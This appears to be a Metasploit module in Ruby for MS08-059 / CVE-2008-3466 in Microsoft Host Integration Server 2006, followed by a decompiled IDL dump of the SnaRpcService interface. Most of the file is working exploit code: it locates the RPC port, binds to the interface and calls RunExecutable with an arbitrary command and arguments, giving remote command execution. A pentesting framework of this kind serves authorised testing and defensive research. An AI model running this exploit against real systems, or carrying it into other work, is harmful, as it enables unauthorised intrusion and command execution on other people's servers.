##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
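class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DCERPC

  # Interface UUID of the HIS 2006 SnaRpcService RPC interface; the IDL dump
  # at the end of this file was recovered from that interface.
  SNA_RPC_UUID = 'ed6ee250-e0d1-11cf-925a-00aa00c006c1'

  # Registers module metadata and the COMMAND / ARGS options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Host Integration Server 2006 Command Execution Vulnerability',
        'Description' => %q{
          This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.
        },
        'DefaultOptions' => {
          'DCERPC::ReadTimeout' => 300 # Long-running RPC calls
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'MSB', 'MS08-059' ],
          [ 'CVE', '2008-3466' ],
          [ 'OSVDB', '49068' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745' ],
        ],
        'DisclosureDate' => '2008-10-14',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # The executed command is expected to leave traces in host logs.
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    # RPORT defaults to 0, which selects automatic endpoint discovery; run
    # refuses to proceed when a port is set explicitly.
    register_options(
      [
        Opt::RPORT(0),
        OptString.new('COMMAND', [ true, 'The command to execute', 'cmd.exe']),
        OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])
      ]
    )
  end

  # Discovers the SnaRpcService port via the endpoint mapper, binds to the
  # interface and invokes opnum 0x01 (_SnaRpcService_RunExecutable in the IDL
  # dump below) with COMMAND and ARGS marshalled as two NDR strings.
  #
  # Only automatic discovery is supported: a non-zero RPORT aborts the run.
  #
  # @return [void]
  def run
    if datastore['RPORT'].to_i != 0
      print_status('Could not use automatic target when the remote port is given')
      return
    end

    dport = find_sna_rpc_port
    unless dport
      print_status('Could not determine the RPC port used by the Service.')
      return
    end

    print_status("Discovered Host Integration Server RPC service on port #{dport}")

    connect(true, { 'RPORT' => dport })

    # Use the discovered port here rather than datastore['RPORT'], which is
    # always 0 at this point, so the handle printed below shows the port the
    # connection actually uses.
    dcerpc_handle(SNA_RPC_UUID, '1.0', 'ncacn_ip_tcp', [dport])
    print_status("Binding to #{handle} ...")

    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    cmd = NDR.string(datastore['COMMAND'].to_s) + NDR.string(datastore['ARGS'].to_s)

    print_status("Sending command: #{datastore['COMMAND']} #{datastore['ARGS']}")

    begin
      dcerpc_call(0x01, cmd)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse => e
      # A missing reply is reported only in verbose mode and is not treated
      # as a failure of the run.
      vprint_error(e.message)
    end

    disconnect
  end

  private

  # Queries the endpoint mapper on RHOST for the TCP port of the SnaRpcService
  # interface, trying interface version 1.0 first and then 1.1.
  #
  # @return [Integer, nil] the discovered port, or nil when neither version is registered
  def find_sna_rpc_port
    dcerpc_endpoint_find_tcp(datastore['RHOST'], SNA_RPC_UUID, '1.0', 'ncacn_ip_tcp') ||
      dcerpc_endpoint_find_tcp(datastore['RHOST'], SNA_RPC_UUID, '1.1', 'ncacn_ip_tcp')
  end
end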
=begin
/*
 * IDL code generated by mIDA v1.0.8
 * Copyright (C) 2006, Tenable Network Security
 * http://cgi.tenablesecurity.com/tenable/mida.php
 *
 *
 * Decompilation information:
 * RPC stub type: inline
 */

[
  uuid(ed6ee250-e0d1-11cf-925a-00aa00c006c1),
  version(1.1)
]

interface mIDA_interface
{

  unknown _SnaRpcService_PingServer (
  );


  /* opcode: 0x01, address: 0x01002CBB */

  small _SnaRpcService_RunExecutable (
    [in][string] char arg_1,
    [in][string] char arg_2
  );

  /* opcode: 0x02, address: 0x01002F0B */

  long _SnaRpcService_CallRemoteDll (
    [in] long arg_1,
    [in][size_is(arg_1)] byte arg_2[],
    [in] long arg_3,
    [in][size_is(arg_1)] byte arg_4[]
  );

  unknown _SnaRpcService_GetInstalledDrives (
  );

  unknown _SnaRpcService_ServiceTableUpdate (
  );


  /* opcode: 0x05, address: 0x0100363C */

  long _SnaRpcService_GetWindowsVersion (
    [in] long arg_1,
    [in, out][size_is(arg_1)] byte arg_2[]
  );


  /* opcode: 0x06, address: 0x01003942 */

  small _SnaRpcService_RunExecutableEx (
    [in][string] char arg_1,
    [in][string] char arg_2,
    [in][string] char arg_3
  );


  /* opcode: 0x07, address: 0x01003BAB */

  long _SnaRpcService_GetDLCMediaType (
    [in][string] char arg_1,
    [out][ref] long * arg_2
  );


  /* opcode: 0x08, address: 0x01003E29 */

  small _SnaRpcService_UserHasAccess (
    [in] long arg_1
  );


  /* opcode: 0x09, address: 0x01004061 */

  small _SnaRpcService_ConfigureHisService (
    [in][string] char arg_1
  );


  /* opcode: 0x0A, address: 0x01004272 */

  small _SnaRpcService_ConfigureServiceAccount (
    [in][string] char arg_1
  );

}
=end